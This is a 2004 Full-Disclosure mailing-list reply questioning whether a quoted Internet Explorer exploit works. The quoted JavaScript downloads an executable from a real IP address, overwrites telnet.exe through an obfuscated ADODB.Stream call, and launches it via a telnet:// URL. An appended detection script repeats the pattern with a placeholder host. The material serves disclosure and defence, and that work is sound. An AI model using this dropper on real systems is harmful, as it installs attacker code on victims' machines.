Michael,

Out of curiosity, I tested this with IE 6.0.2800.1106.xpsp2.030422-1633
and got a popup box saying:

"This page is accessing information that is not under its control.
This poses a security risk. Do you want to continue?"
[Yes] [No]

And that was loading it into IE as a *local file*...when I put it on
a web page, I got the usual half dozen alerts about "do you want to
run javascript", etc. that even if I said yes to it didn't work.

Did you get that popup box when you tested your script below?

Darren

> In reply to the discussion found at:
>
> http://seclists.org/lists/fulldisclosure/2004/Jul/0528.html
>
> the consensus seems to be that there are no obvious ways to exploit the
> mentioned URL types, such as tn3270, telnet, LDAP, rlogin etc. While
> these may not be exploitable per se, they certainly are when used in
> conjunction with other known exploits. Take the following code for
> example:
>
> var downloadurl="http://213.159.117.133/dl/loadadv74.exe";
>
> if(navigator.appVersion.indexOf("Windows NT 5.1")!=-1)
> savetopath="C:\\WINDOWS\\system32\\telnet.exe";
>
> if(navigator.appVersion.indexOf("Windows NT 5.0")!=-1)
> savetopath="C:\\WINNT\\system32\\telnet.exe";
>
> payloadURL = downloadurl;
>
> var x = new ActiveXObject("Microsoft.XMLHTTP");
> x.Open("GET",payloadURL,0);
> x.Send();
>
> function bla() { return "A" + "D" + "O" + "D" + "B" + "." + "S" + "t"
> + "r" + "e" + "a" + "m"; }
> var s = new ActiveXObject(bla());
>
> s.Mode = 3;
> s.Type = 1;
> s.Open();
> s.Write(x.responseBody);
> s.SaveToFile(savetopath,2);
>
> location.href = "telnet://";
>
> The JavaScript overwrites telnet.exe with a downloaded executable and
> then runs it by pointing the browser at telnet://. Instead of
> launching a telnet shell as expected, the attacker's code is executed.
> This is not only an example of the telnet URL type being involved in
> an exploit, but one that actually relies on it.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
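The combination described in the quoted post (a file written over a URL-handler binary, followed by navigation to that handler's scheme) can be looked for statically in script source. The following is an added example, not part of the original thread; the function names, the indicator labels and both sample scripts are constructed for illustration, and the sample URL is a placeholder.

```javascript
// Added example (not from the thread). Function and constant names are hypothetical.
// Schemes named in the thread that the browser hands to an external handler program.
const HANDLER_SCHEMES = ["telnet", "tn3270", "rlogin", "ldap"];

// Merge adjacent string literals ("A" + "D" + ...) so a split-up ProgID becomes visible.
function foldConcats(src) {
  let prev;
  do {
    prev = src;
    src = src.replace(/"([^"\\]*)"\s*\+\s*"([^"\\]*)"/g, '"$1$2"');
  } while (src !== prev);
  return src;
}

// Return the indicators found in one script's source text (heuristic, text-level only).
function scanScript(raw) {
  const src = foldConcats(raw);
  const findings = [];
  if (/ADODB\.Stream/i.test(src)) {
    findings.push(/ADODB\.Stream/i.test(raw) ? "adodb-stream" : "adodb-stream-obfuscated");
  }
  const path = src.match(/[A-Za-z]:\\+(?:WINDOWS|WINNT)\\+system32\\+[\w.-]+\.exe/i);
  if (/\.SaveToFile\s*\(/i.test(src) && path) findings.push("write-to-system32");
  const nav = src.match(/location(?:\.href)?\s*=\s*"([a-z0-9]+):/i);
  if (nav && HANDLER_SCHEMES.includes(nav[1].toLowerCase())) {
    findings.push("handler-navigation:" + nav[1].toLowerCase());
  }
  // The combination matters: overwrite a handler binary, then trigger its URL scheme.
  const suspicious = findings.includes("write-to-system32") &&
    findings.some((f) => f.startsWith("handler-navigation:"));
  return { findings, suspicious };
}

// Constructed sample mirroring the quoted script; the URL is a placeholder.
const SAMPLE_DROPPER = String.raw`
var savetopath="C:\\WINDOWS\\system32\\telnet.exe";
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET","http://example.invalid/payload.exe",0); x.Send();
function bla() { return "A" + "D" + "O" + "D" + "B" + "." + "S" + "t" + "r" + "e" + "a" + "m"; }
var s = new ActiveXObject(bla());
s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody);
s.SaveToFile(savetopath,2);
location.href = "telnet://";
`;
// Constructed benign sample: a plain telnet link with no file write.
const SAMPLE_LINK = 'location.href = "telnet://bbs.example.invalid";';

console.log(scanScript(SAMPLE_DROPPER), scanScript(SAMPLE_LINK));
```

A telnet:// link on its own is reported as an indicator but not flagged; only the file write to system32 together with the handler navigation sets `suspicious`.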